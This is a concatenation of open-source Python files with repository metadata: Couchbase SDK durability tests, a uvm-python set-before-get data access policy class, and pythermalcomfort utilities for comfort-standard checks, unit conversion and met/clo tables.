# cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistTo.ONE, replicate_to=ReplicateTo(num_replicas))
cb_env.collection.upsert(key, value,
UpsertOptions(durability=durability), timeout=timedelta(seconds=3))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert_fail(self, cb_env, num_replicas):
if num_replicas > 2:
pytest.skip("Too many replicas enabled.")
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_client_durable_upsert_single_node(self, cb_env, num_replicas):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=PersistToExtended.FOUR, replicate_to=ReplicateTo(num_replicas))
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
@pytest.mark.parametrize('persist_to', [PersistToExtended.NONE, PersistToExtended.ACTIVE, PersistToExtended.ONE])
def test_client_persist_to_extended(self, cb_env, persist_to):
key, value = cb_env.get_existing_doc()
durability = ClientDurability(
persist_to=persist_to, replicate_to=ReplicateTo.ONE)
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_insert(self, cb_env):
key, value = cb_env.get_new_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_insert_single_node(self, cb_env):
key, value = cb_env.get_new_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.insert(key, value, InsertOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_mutate_in(self, cb_env):
key, value = cb_env.get_existing_doc()
value['make'] = 'New Make'
value['model'] = 'New Model'
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.mutate_in(key,
(SD.upsert('make', 'New Make'), SD.replace('model', 'New Model')),
MutateInOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_mutate_in_single_node(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.mutate_in(key, (SD.upsert('make', 'New Make'),), MutateInOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_remove(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.remove(key, RemoveOptions(durability=durability))
with pytest.raises(DocumentNotFoundException):
cb_env.collection.get(key)
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_remove_single_node(self, cb_env):
key = cb_env.get_existing_doc(key_only=True)
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.remove(key, RemoveOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_replace(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_replace_single_node(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.replace(key, value, ReplaceOptions(durability=durability))
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_multi_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_upsert(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
result = cb_env.collection.get(key)
assert value == result.content_as[dict]
@pytest.mark.usefixtures('check_sync_durability_supported')
@pytest.mark.usefixtures('check_single_node')
@pytest.mark.usefixtures('check_has_replicas')
def test_server_durable_upsert_single_node(self, cb_env):
key, value = cb_env.get_existing_doc()
durability = ServerDurability(level=DurabilityLevel.PERSIST_TO_MAJORITY)
with pytest.raises(DurabilityImpossibleException):
cb_env.collection.upsert(key, value, UpsertOptions(durability=durability))
class ClassicDurabilityTests(DurabilityTestSuite):
@pytest.fixture(scope='class')
def test_manifest_validated(self):
def valid_test_method(meth):
attr = getattr(ClassicDurabilityTests, meth)
return callable(attr) and not meth.startswith('__') and meth.startswith('test')
method_list = [meth for meth in dir(ClassicDurabilityTests) if valid_test_method(meth)]
compare = set(DurabilityTestSuite.TEST_MANIFEST).difference(method_list)
return compare
@pytest.fixture(scope='class', name='cb_env', params=[CollectionType.DEFAULT, CollectionType.NAMED])
def couchbase_test_environment(self, cb_base_env, test_manifest_validated, request):
if test_manifest_validated:
pytest.fail(f'Test manifest not validated. Missing tests: {test_manifest_validated}.')
cb_base_env.enable_bucket_mgmt()
cb_base_env.setup(request.param)
yield cb_base_env
cb_base_env.teardown(request.param)
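# Hedged usage sketch (not part of the test suite): the durability options
# exercised above map directly onto standalone SDK calls. The connection
# string, credentials, and bucket name below are illustrative assumptions.
#
# from datetime import timedelta
# from couchbase.auth import PasswordAuthenticator
# from couchbase.cluster import Cluster
# from couchbase.durability import ClientDurability, PersistTo, ReplicateTo
# from couchbase.options import ClusterOptions, UpsertOptions
#
# cluster = Cluster('couchbase://localhost',
#                   ClusterOptions(PasswordAuthenticator('user', 'password')))
# collection = cluster.bucket('default').default_collection()
# # Block until the write persists on one node and reaches one replica.
# durability = ClientDurability(persist_to=PersistTo.ONE,
#                               replicate_to=ReplicateTo.ONE)
# collection.upsert('doc-key', {'v': 1},
#                   UpsertOptions(durability=durability),
#                   timeout=timedelta(seconds=3))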
|
8a9ef1646b4d68498b2f2d381cdd5795c07777d7
|
ee303308d85c28467a7dfe5300951d49a3866fb3
|
/src/uvm/dap/uvm_set_before_get_dap.py
|
9e2b607a76e960ab81aa4880c7f87d8d28dbcd0c
|
[
"Apache-2.0"
] |
permissive
|
tpoikela/uvm-python
|
3a66a43100a2903f91e0bb73b84c07c1003f7763
|
fc5f955701b2b56c1fddac195c70cb3ebb9139fe
|
refs/heads/master
| 2023-05-02T05:08:00.792132
| 2023-04-24T16:07:14
| 2023-04-24T16:07:14
| 232,838,902
| 199
| 43
|
Apache-2.0
| 2023-04-24T16:10:44
| 2020-01-09T15:22:26
|
Python
|
UTF-8
|
Python
| false
| false
| 7,255
|
py
|
uvm_set_before_get_dap.py
|
#//
#//----------------------------------------------------------------------------
#// Copyright 2007-2011 Mentor Graphics Corporation
#// Copyright 2007-2011 Cadence Design Systems, Inc.
#// Copyright 2010-2011 Synopsys, Inc.
#// Copyright 2013 NVIDIA Corporation
#// Copyright 2019 Tuomas Poikela (tpoikela)
#// All Rights Reserved Worldwide
#//
#// Licensed under the Apache License, Version 2.0 (the
#// "License"); you may not use this file except in
#// compliance with the License. You may obtain a copy of
#// the License at
#//
#// http://www.apache.org/licenses/LICENSE-2.0
#//
#// Unless required by applicable law or agreed to in
#// writing, software distributed under the License is
#// distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
#// CONDITIONS OF ANY KIND, either express or implied. See
#// the License for the specific language governing
#// permissions and limitations under the License.
#//----------------------------------------------------------------------------
#
from .uvm_set_get_dap_base import uvm_set_get_dap_base
from ..macros.uvm_object_defines import uvm_object_utils
from ..macros.uvm_message_defines import *
from ..base.sv import sv
from ..base.uvm_globals import uvm_check_output_args
ERR_MSG1 = "Attempt to get value on '%s', but the data access policy forbids calling 'get' prior to calling 'set' or 'try_set'!"
#// Class: uvm_set_before_get_dap
#// Provides a 'Set Before Get' Data Access Policy.
#//
#// The 'Set Before Get' Data Access Policy enforces that the value must
#// be written at ~least~ once before it is read. This DAP can be used to
#// pass shared information to multiple components during standard configuration,
#// even if that information hasn't yet been determined.
#//
#// Such DAP objects can be useful for passing a 'placeholder' reference, before
#// the information is actually available. A good example of this would be
#// the virtual sequencer:
#//
#//| typedef uvm_set_before_get_dap#(uvm_sequencer_base) seqr_dap_t;
#//| virtual_sequencer_type virtual_sequencer;
#//| agent_type my_agent;
#//| seqr_dap_t seqr_dap;
#//|
#//| function void my_env::build_phase(uvm_phase phase);
#//| seqr_dap = seqr_dap_t::type_id::create("seqr_dap");
#//| // Pass the DAP, because we don't have a reference to the
#//| // real sequencer yet...
#//| uvm_config_db#(seqr_dap_t)::set(this, "virtual_sequencer", "seqr_dap", seqr_dap);
#//|
#//| // Create the virtual sequencer
#//| virtual_sequencer = virtual_sequencer_type::type_id::create("virtual_sequencer", this);
#//|
#//| // Create the agent
#//| agent = agent_type::type_id::create("agent", this);
#//| endfunction
#//|
#//| function void my_env::connect_phase(uvm_phase phase);
#//| // Now that we know the value is good, we can set it
#//| seqr_dap.set(agent.sequencer);
#//| endfunction
#//
#// In the example above, the environment didn't have a reference to the
#// agent's sequencer yet, because the agent hadn't executed its ~build_phase~.
#// The environment needed to give the virtual sequencer a "Set before get" DAP
#// so that the virtual sequencer (and any sequences one it), could ~eventually~
#// see the agent's sequencer, when the reference was finally available. If
#// the virtual sequencer (or any sequences on it) attempted to 'get' the
#// reference to the agent's sequencer ~prior~ to the environment assigning it,
#// an error would have been reported.
#
#class uvm_set_before_get_dap#(type T=int) extends uvm_set_get_dap_base#(T);
class uvm_set_before_get_dap(uvm_set_get_dap_base):
#
# // Used for self-references
# typedef uvm_set_before_get_dap#(T) this_type;
#
# // Function: new
# // Constructor
def __init__(self, name="unnamed-uvm_set_before_get_dap#(T)"):
uvm_set_get_dap_base.__init__(self, name)
self.m_set = False
self.m_value = None
# // Group: Set/Get Interface
#
# // Function: set
# // Updates the value stored within the DAP.
# //
def set(self, value):
self.m_set = True
self.m_value = value
# // Function: try_set
# // Attempts to update the value stored within the DAP.
# //
# // ~try_set~ will always return a 1.
# virtual function bit try_set(T value);
# set(value);
# return 1;
# endfunction : try_set
#
# // Function: get
# // Returns the current value stored within the DAP.
# //
# // If 'get' is called before a call to <set> or <try_set>, then
# // an error will be reported.
def get(self):
if self.m_set is False:
uvm_error("UVM/SET_BEFORE_GET_DAP/NO_SET", sv.sformatf(ERR_MSG1, self.get_full_name()))
return self.m_value
#
# // Function: try_get
# // Attempts to retrieve the current value stored within the DAP
# //
# // If the value has not been 'set', then try_get will return a 0,
# // otherwise it will return a 1, and set ~value~ to the current
# // value stored within the DAP.
def try_get(self, value):
uvm_check_output_args([value])
if self.m_set is False:
return 0
else:
value.append(self.m_value)
return 1
#
# // Group: Introspection
# //
# // The ~uvm_set_before_get_dap~ cannot support the standard UVM
# // instrumentation methods (~copy~, ~clone~, ~pack~ and
# // ~unpack~), due to the fact that they would potentially
# // violate the access policy.
# //
# // A call to any of these methods will result in an error.
#
# virtual function void do_copy(uvm_object rhs);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/CPY",
# "'copy()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_copy
#
# virtual function void do_pack(uvm_packer packer);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/PCK",
# "'pack()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_pack
#
# virtual function void do_unpack(uvm_packer packer);
# `uvm_error("UVM/SET_BEFORE_GET_DAP/UPK",
# "'unpack()' is not supported for 'uvm_set_before_get_dap#(T)'")
# endfunction : do_unpack
#
# // Group- Reporting
#
# // Function- convert2string
# virtual function string convert2string();
# if (m_set)
# return $sformatf("(%s) %0p [SET]", `uvm_typename(m_value), m_value);
# else
# return $sformatf("(%s) %0p [UNSET]", `uvm_typename(m_value), m_value);
# endfunction : convert2string
#
# // Function- do_print
# virtual function void do_print(uvm_printer printer);
# super.do_print(printer);
# printer.print_field_int("set_state", m_set, $bits(m_set));
# printer.print_generic("value",
# `uvm_typename(m_value),
# 0,
# $sformatf("%0p", m_value));
#
# endfunction : do_print
#
#endclass // uvm_set_before_get_dap
uvm_object_utils(uvm_set_before_get_dap)
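# Hedged usage sketch (illustrative, not part of this module): the DAP is
# created, written exactly once, and only then read. `some_sequencer` is an
# assumed placeholder for the real reference.
#
# dap = uvm_set_before_get_dap("seqr_dap")
# dap.set(some_sequencer)      # must happen before any get()
# seqr = dap.get()             # OK now; calling get() first would uvm_error
# out = []
# if dap.try_get(out):         # non-erroring variant; appends the value to out
#     seqr = out[0]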
|
9820d214095e9d359699691b1f74a2f1e46b0d9d
|
a6f2d143f8301ef0cf2ab2524ed1a7d4115f6da6
|
/src/pythermalcomfort/utilities.py
|
d72af05bb2c3f857aa2f6be3714b6c143a52085f
|
[
"MIT"
] |
permissive
|
CenterForTheBuiltEnvironment/pythermalcomfort
|
4612fa9803613abd2101636c8e9bcf4b357ab254
|
8893b04aa06f84809f6f6d8324008cd1978cdd47
|
refs/heads/master
| 2023-09-01T02:24:57.594539
| 2023-07-05T01:39:43
| 2023-07-05T01:39:43
| 239,588,350
| 108
| 47
|
MIT
| 2023-09-14T00:04:01
| 2020-02-10T18:55:51
|
Python
|
UTF-8
|
Python
| false
| false
| 18,833
|
py
|
utilities.py
|
import numpy as np
import warnings
import math
import re
from pythermalcomfort.psychrometrics import p_sat, t_o
from pythermalcomfort.shared_functions import valid_range
warnings.simplefilter("always")
def transpose_sharp_altitude(sharp, altitude):
altitude_new = math.degrees(
math.asin(
math.sin(math.radians(abs(sharp - 90))) * math.cos(math.radians(altitude))
)
)
sharp = math.degrees(
math.atan(math.sin(math.radians(sharp)) * math.tan(math.radians(90 - altitude)))
)
sol_altitude = altitude_new
return round(sharp, 3), round(sol_altitude, 3)
def check_standard_compliance(standard, **kwargs):
params = dict()
params["standard"] = standard
for key, value in kwargs.items():
params[key] = value
if params["standard"] == "ankle_draft":
for key, value in params.items():
if key == "met" and value > 1.3:
warnings.warn(
"The ankle draft model is only valid for met <= 1.3",
UserWarning,
)
if key == "clo" and value > 0.7:
warnings.warn(
"The ankle draft model is only valid for clo <= 0.7",
UserWarning,
)
elif params["standard"] == "ashrae": # based on table 7.3.4 ashrae 55 2020
for key, value in params.items():
if key in ["tdb", "tr"]:
if key == "tdb":
parameter = "dry-bulb"
else:
parameter = "mean radiant"
if value > 40 or value < 10:
warnings.warn(
f"ASHRAE {parameter} temperature applicability limits between"
" 10 and 40 °C",
UserWarning,
)
if key in ["v", "vr"] and (value > 2 or value < 0):
warnings.warn(
"ASHRAE air speed applicability limits between 0 and 2 m/s",
UserWarning,
)
if key == "met" and (value > 4 or value < 1):
warnings.warn(
"ASHRAE met applicability limits between 1.0 and 4.0 met",
UserWarning,
)
if key == "clo" and (value > 1.5 or value < 0):
warnings.warn(
"ASHRAE clo applicability limits between 0.0 and 1.5 clo",
UserWarning,
)
if key == "v_limited" and value > 0.2:
raise ValueError(
"This equation is only applicable for air speed lower than 0.2 m/s"
)
elif params["standard"] == "iso": # based on ISO 7730:2005 page 3
for key, value in params.items():
if key == "tdb" and (value > 30 or value < 10):
warnings.warn(
"ISO air temperature applicability limits between 10 and 30 °C",
UserWarning,
)
if key == "tr" and (value > 40 or value < 10):
warnings.warn(
"ISO mean radiant temperature applicability limits between 10 and"
" 40 °C",
UserWarning,
)
if key in ["v", "vr"] and (value > 1 or value < 0):
warnings.warn(
"ISO air speed applicability limits between 0 and 1 m/s",
UserWarning,
)
if key == "met" and (value > 4 or value < 0.8):
warnings.warn(
"ISO met applicability limits between 0.8 and 4.0 met",
UserWarning,
)
if key == "clo" and (value > 2 or value < 0):
warnings.warn(
"ISO clo applicability limits between 0.0 and 2 clo",
UserWarning,
)
elif params["standard"] == "ISO7933": # based on ISO 7933:2004 Annex A
if params["tdb"] > 50 or params["tdb"] < 15:
warnings.warn(
"ISO 7933:2004 air temperature applicability limits between 15 and"
" 50 °C",
UserWarning,
)
p_a = p_sat(params["tdb"]) / 1000 * params["rh"] / 100
rh_max = 4.5 * 100 * 1000 / p_sat(params["tdb"])
if p_a > 4.5 or p_a < 0:
warnings.warn(
f"ISO 7933:2004 rh applicability limits between 0 and {rh_max} %",
UserWarning,
)
if params["tr"] - params["tdb"] > 60 or params["tr"] - params["tdb"] < 0:
warnings.warn(
"ISO 7933:2004 t_r - t_db applicability limits between 0 and 60 °C",
UserWarning,
)
if params["v"] > 3 or params["v"] < 0:
warnings.warn(
"ISO 7933:2004 air speed applicability limits between 0 and 3 m/s",
UserWarning,
)
if params["met"] > 450 or params["met"] < 100:
warnings.warn(
"ISO 7933:2004 met applicability limits between 100 and 450 met",
UserWarning,
)
if params["clo"] > 1 or params["clo"] < 0.1:
warnings.warn(
"ISO 7933:2004 clo applicability limits between 0.1 and 1 clo",
UserWarning,
)
def check_standard_compliance_array(standard, **kwargs):
default_kwargs = {"airspeed_control": True}
params = {**default_kwargs, **kwargs}
if standard == "ashrae": # based on table 7.3.4 ashrae 55 2020
tdb_valid = valid_range(params["tdb"], (10.0, 40.0))
tr_valid = valid_range(params["tr"], (10.0, 40.0))
v_valid = valid_range(params["v"], (0.0, 2.0))
if not params["airspeed_control"]:
v_valid = np.where(
(params["v"] > 0.8) & (params["clo"] < 0.7) & (params["met"] < 1.3),
np.nan,
v_valid,
)
to = t_o(params["tdb"], params["tr"], params["v"])
v_limit = 50.49 - 4.4047 * to + 0.096425 * to * to
v_valid = np.where(
(23 < to)
& (to < 25.5)
& (params["v"] > v_limit)
& (params["clo"] < 0.7)
& (params["met"] < 1.3),
np.nan,
v_valid,
)
v_valid = np.where(
(to <= 23)
& (params["v"] > 0.2)
& (params["clo"] < 0.7)
& (params["met"] < 1.3),
np.nan,
v_valid,
)
if "met" in params.keys():
met_valid = valid_range(params["met"], (1.0, 4.0))
clo_valid = valid_range(params["clo"], (0.0, 1.5))
return tdb_valid, tr_valid, v_valid, met_valid, clo_valid
else:
return tdb_valid, tr_valid, v_valid
if standard == "fan_heatwaves":
tdb_valid = valid_range(params["tdb"], (20.0, 50.0))
tr_valid = valid_range(params["tr"], (20.0, 50.0))
v_valid = valid_range(params["v"], (0.1, 4.5))
rh_valid = valid_range(params["rh"], (0, 100))
met_valid = valid_range(params["met"], (0.7, 2))
clo_valid = valid_range(params["clo"], (0.0, 1))
return tdb_valid, tr_valid, v_valid, rh_valid, met_valid, clo_valid
if standard == "iso": # based on ISO 7730:2005 page 3
tdb_valid = valid_range(params["tdb"], (10.0, 30.0))
tr_valid = valid_range(params["tr"], (10.0, 40.0))
v_valid = valid_range(params["v"], (0.0, 1.0))
met_valid = valid_range(params["met"], (0.8, 4.0))
clo_valid = valid_range(params["clo"], (0.0, 2))
return tdb_valid, tr_valid, v_valid, met_valid, clo_valid
def body_surface_area(weight, height, formula="dubois"):
"""Returns the body surface area in square meters.
Parameters
----------
weight : float
body weight, [kg]
height : float
height, [m]
formula : str, optional,
formula used to calculate the body surface area. default="dubois"
Choose a name from "dubois", "takahira", "fujimoto", or "kurazumi".
Returns
-------
body_surface_area : float
body surface area, [m2]
"""
if formula == "dubois":
return 0.202 * (weight**0.425) * (height**0.725)
elif formula == "takahira":
return 0.2042 * (weight**0.425) * (height**0.725)
elif formula == "fujimoto":
return 0.1882 * (weight**0.444) * (height**0.663)
elif formula == "kurazumi":
return 0.2440 * (weight**0.383) * (height**0.693)
else:
        raise ValueError(
            f"The formula '{formula}' to calculate the body surface area does not exist."
        )
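# Worked example (derived from the DuBois formula above, values rounded):
#   body_surface_area(weight=80, height=1.8)
#   = 0.202 * 80**0.425 * 1.8**0.725 ≈ 1.99 m2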
def f_svv(w, h, d):
"""Calculates the sky-vault view fraction.
Parameters
----------
w : float
width of the window, [m]
h : float
height of the window, [m]
d : float
distance between the occupant and the window, [m]
Returns
-------
f_svv : float
sky-vault view fraction ranges between 0 and 1
"""
return (
math.degrees(math.atan(h / (2 * d)))
* math.degrees(math.atan(w / (2 * d)))
/ 16200
)
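# Worked example: a 2 m x 2 m window viewed from 1 m away gives
#   f_svv(2, 2, 1) = 45 * 45 / 16200 = 0.125
# since both half-angles are atan(1) = 45 degrees.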
def v_relative(v, met):
"""Estimates the relative air speed which combines the average air speed of
the space plus the relative air speed caused by the body movement. Vag is assumed to
be 0 for metabolic rates equal and lower than 1 met and otherwise equal to
Vag = 0.3 (M – 1) (m/s)
Parameters
----------
v : float or array-like
air speed measured by the sensor, [m/s]
met : float
metabolic rate, [met]
Returns
-------
vr : float or array-like
relative air speed, [m/s]
"""
return np.where(met > 1, np.around(v + 0.3 * (met - 1), 3), v)
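# Worked example: for met = 2.0 the body-movement term is 0.3 * (2 - 1) = 0.3,
# so v_relative(v=0.1, met=2.0) returns 0.4 m/s; for met <= 1 the measured
# speed is returned unchanged.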
def clo_dynamic(clo, met, standard="ASHRAE"):
"""Estimates the dynamic clothing insulation of a moving occupant. The activity as
well as the air speed modify the insulation characteristics of the clothing and the
adjacent air layer. Consequently, the ISO 7730 states that the clothing insulation
shall be corrected [2]_. The ASHRAE 55 Standard corrects for the effect
of the body movement for met equal or higher than 1.2 met using the equation
clo = Icl × (0.6 + 0.4/met)
Parameters
----------
clo : float or array-like
clothing insulation, [clo]
met : float or array-like
metabolic rate, [met]
standard: str (default="ASHRAE")
- If "ASHRAE", uses Equation provided in Section 5.2.2.2 of ASHRAE 55 2020
Returns
-------
clo : float or array-like
dynamic clothing insulation, [clo]
"""
standard = standard.lower()
if standard not in ["ashrae", "iso"]:
raise ValueError(
"only the ISO 7730 and ASHRAE 55 2020 models have been implemented"
)
if standard == "ashrae":
return np.where(met > 1.2, np.around(clo * (0.6 + 0.4 / met), 3), clo)
else:
return np.where(met > 1, np.around(clo * (0.6 + 0.4 / met), 3), clo)
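# Worked example (ASHRAE correction): clo_dynamic(clo=1.0, met=2.0) returns
# 1.0 * (0.6 + 0.4 / 2.0) = 0.8 clo; for met <= 1.2 the ASHRAE branch leaves
# the static insulation unchanged.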
def running_mean_outdoor_temperature(temp_array, alpha=0.8, units="SI"):
"""Estimates the running mean temperature also known as prevailing mean
outdoor temperature.
Parameters
----------
temp_array: list
array containing the mean daily temperature in descending order (i.e. from
newest/yesterday to oldest) :math:`[t_{day-1}, t_{day-2}, ... ,
t_{day-n}]`.
Where :math:`t_{day-1}` is yesterday's daily mean temperature. The EN
16798-1 2019 [3]_ states that n should be equal to 7
alpha : float
constant between 0 and 1. The EN 16798-1 2019 [3]_ recommends a value of 0.8,
while the ASHRAE 55 2020 recommends to choose values between 0.9 and 0.6,
corresponding to a slow- and fast- response running mean, respectively.
Adaptive comfort theory suggests that a slow-response running mean (alpha =
0.9) could be more appropriate for climates in which synoptic-scale (day-to-
day) temperature dynamics are relatively minor, such as the humid tropics.
units: str default="SI"
select the SI (International System of Units) or the IP (Imperial Units) system.
Returns
-------
t_rm : float
running mean outdoor temperature
"""
if units.lower() == "ip":
for ix, x in enumerate(temp_array):
temp_array[ix] = units_converter(tdb=temp_array[ix])[0]
coeff = [alpha**ix for ix, x in enumerate(temp_array)]
t_rm = sum([a * b for a, b in zip(coeff, temp_array)]) / sum(coeff)
if units.lower() == "ip":
t_rm = units_converter(tmp=t_rm, from_units="si")[0]
return round(t_rm, 1)
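# Worked example: with temp_array=[20, 22] (yesterday first) and alpha=0.8,
#   t_rm = (1 * 20 + 0.8 * 22) / (1 + 0.8) = 37.6 / 1.8 ≈ 20.9 °C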
def units_converter(from_units="ip", **kwargs):
"""Converts IP values to SI units.
Parameters
----------
from_units: str
specify system to convert from
**kwargs : [t, v]
Returns
-------
converted values in SI units
"""
results = list()
if from_units == "ip":
for key, value in kwargs.items():
if "tmp" in key or key == "tr" or key == "tdb":
results.append((value - 32) * 5 / 9)
if key in ["v", "vr", "vel"]:
results.append(value / 3.281)
if key == "area":
results.append(value / 10.764)
if key == "pressure":
results.append(value * 101325)
elif from_units == "si":
for key, value in kwargs.items():
if "tmp" in key or key == "tr" or key == "tdb":
results.append((value * 9 / 5) + 32)
if key in ["v", "vr", "vel"]:
results.append(value * 3.281)
if key == "area":
results.append(value * 10.764)
if key == "pressure":
results.append(value / 101325)
return results
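# Worked example: units_converter(tdb=77, v=3.281) converts from IP by default
# and returns [25.0, 1.0], i.e. 77 °F -> 25 °C and 3.281 ft/s -> 1 m/s, in the
# order the keyword arguments were supplied.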
def mapping(value, map_dictionary, right=True):
"""Maps a temperature array to stress categories.
Parameters
----------
value : float, array-like
Temperature to map.
map_dictionary: dict
Dictionary used to map the values
right: bool, optional
Indicating whether the intervals include the right or the left bin edge.
Returns
-------
Stress category for each input temperature.
"""
bins = np.array(list(map_dictionary.keys()))
words = np.append(np.array(list(map_dictionary.values())), "unknown")
return words[np.digitize(value, bins, right=right)]
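# Worked example (keys must be ascending and act as inclusive upper bin edges
# when right=True):
#   categories = {28: "no heat stress", 38: "heat stress"}
#   mapping(25, categories) -> "no heat stress"
#   mapping(30, categories) -> "heat stress"
#   mapping(40, categories) -> "unknown"   # above the last edge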
#: Met values of typical tasks.
met_typical_tasks = {
"Sleeping": 0.7,
"Reclining": 0.8,
"Seated, quiet": 1.0,
"Reading, seated": 1.0,
"Writing": 1.0,
"Typing": 1.1,
"Standing, relaxed": 1.2,
"Filing, seated": 1.2,
"Flying aircraft, routine": 1.2,
"Filing, standing": 1.4,
"Driving a car": 1.5,
"Walking about": 1.7,
"Cooking": 1.8,
"Table sawing": 1.8,
"Walking 2mph (3.2kmh)": 2.0,
"Lifting/packing": 2.1,
"Seated, heavy limb movement": 2.2,
"Light machine work": 2.2,
"Flying aircraft, combat": 2.4,
"Walking 3mph (4.8kmh)": 2.6,
"House cleaning": 2.7,
"Driving, heavy vehicle": 3.2,
"Dancing": 3.4,
"Calisthenics": 3.5,
"Walking 4mph (6.4kmh)": 3.8,
"Tennis": 3.8,
"Heavy machine work": 4.0,
"Handling 100lb (45 kg) bags": 4.0,
"Pick and shovel work": 4.4,
"Basketball": 6.3,
"Wrestling": 7.8,
}
#: Total clothing insulation of typical ensembles.
clo_typical_ensembles = {
"Walking shorts, short-sleeve shirt": 0.36,
"Typical summer indoor clothing": 0.5,
"Knee-length skirt, short-sleeve shirt, sandals, underwear": 0.54,
"Trousers, short-sleeve shirt, socks, shoes, underwear": 0.57,
"Trousers, long-sleeve shirt": 0.61,
"Knee-length skirt, long-sleeve shirt, full slip": 0.67,
"Sweat pants, long-sleeve sweatshirt": 0.74,
"Jacket, Trousers, long-sleeve shirt": 0.96,
"Typical winter indoor clothing": 1.0,
}
#: Clo values of individual clothing elements. To calculate the total clothing insulation you need to add these values together.
clo_individual_garments = {
"Metal chair": 0.00,
"Bra": 0.01,
"Wooden stool": 0.01,
"Ankle socks": 0.02,
"Shoes or sandals": 0.02,
"Slippers": 0.03,
"Panty hose": 0.02,
"Calf length socks": 0.03,
"Women's underwear": 0.03,
"Men's underwear": 0.04,
"Knee socks (thick)": 0.06,
"Short shorts": 0.06,
"Walking shorts": 0.08,
"T-shirt": 0.08,
"Standard office chair": 0.10,
"Executive chair": 0.15,
"Boots": 0.1,
"Sleeveless scoop-neck blouse": 0.12,
"Half slip": 0.14,
"Long underwear bottoms": 0.15,
"Full slip": 0.16,
"Short-sleeve knit shirt": 0.17,
"Sleeveless vest (thin)": 0.1,
"Sleeveless vest (thick)": 0.17,
"Sleeveless short gown (thin)": 0.18,
"Short-sleeve dress shirt": 0.19,
"Sleeveless long gown (thin)": 0.2,
"Long underwear top": 0.2,
"Thick skirt": 0.23,
"Long-sleeve dress shirt": 0.25,
"Long-sleeve flannel shirt": 0.34,
"Long-sleeve sweat shirt": 0.34,
"Short-sleeve hospital gown": 0.31,
"Short-sleeve short robe (thin)": 0.34,
"Short-sleeve pajamas": 0.42,
"Long-sleeve long gown": 0.46,
"Long-sleeve short wrap robe (thick)": 0.48,
"Long-sleeve pajamas (thick)": 0.57,
"Long-sleeve long wrap robe (thick)": 0.69,
"Thin trousers": 0.15,
"Thick trousers": 0.24,
"Sweatpants": 0.28,
"Overalls": 0.30,
"Coveralls": 0.49,
"Thin skirt": 0.14,
"Long-sleeve shirt dress (thin)": 0.33,
"Long-sleeve shirt dress (thick)": 0.47,
